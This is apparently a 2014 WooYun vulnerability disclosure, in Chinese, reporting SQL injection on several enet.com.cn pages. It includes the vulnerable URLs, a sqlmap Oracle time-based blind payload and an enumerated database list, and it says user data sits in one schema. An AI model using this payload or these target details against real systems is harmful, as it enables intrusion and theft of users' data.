当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081685

漏洞标题:硅谷动力主+分站SQL注入致使数据泄漏

相关厂商:enet.com.cn

漏洞作者: Taro

提交时间:2014-11-02 09:59

修复时间:2014-11-07 10:00

公开时间:2014-11-07 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-02: 细节已通知厂商并且等待厂商处理中
2014-11-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

硅谷动力主分站SQL注入致使数据泄漏

详细说明:

http://www.enet.com.cn/elady/star/inforcenter/star.jsp
starmonth=01&stardate=01&acid=4414 存在POST sql注入漏洞
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: starmonth
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: starmonth=01' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(88)||CHR(81)||CHR(90),5)--&stardate=01&acid=4414
---
web application technology: Apache, JSP
back-end DBMS: Oracle
available databases [20]:
[*] "]HOW"
[*] ADV
[*] ARTICLE_COMMENT
[*] B2B_ADMIN
[*] DBSNMP
[*] EKA
[*] FASHION
[*] FILTER_ADMIN
[*] IDC
[*] IFLOW_ADMIN
[*] IFLOW_ENEWS
[*] OUTLN
[*] PASS
[*] PDB_ADMIN
[*] ROBOT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WPSYS
[*] XPDB_ADMIN
其中在PASS中包含了主站的用户信息,我就不贴出来了
http://www.enet.com.cn/ediy/inforcenter/articlelist.jsp?ccid=3594&pcid=42973&pcid=9&pcid=12&pcid=15&pcid=18

2B17F61CC6984687BE8F3F09B63388C1.png


http://research.enet.com.cn/questionnaire/publish/statisticalPaper.jsp?paperID=00090017f85e515f

46BC5280EE5A40F29EBC6F1C5E3E8005.png


available databases [1]:
[*] research
http://other.enet.com.cn/bg_editer/server/list.jsp?id=8

CB217E42D2774648B37C21C188D42D8A.png


available databases [1]:
[*] test

漏洞证明:

http://www.enet.com.cn/elady/star/inforcenter/star.jsp
starmonth=01&stardate=01&acid=4414 存在POST sql注入漏洞
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: starmonth
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: starmonth=01' AND 7329=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(88)||CHR(81)||CHR(90),5)--&stardate=01&acid=4414
---
web application technology: Apache, JSP
back-end DBMS: Oracle

修复方案:

版权声明:转载请注明来源 Taro@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-07 10:00

厂商回复:

最新状态:

暂无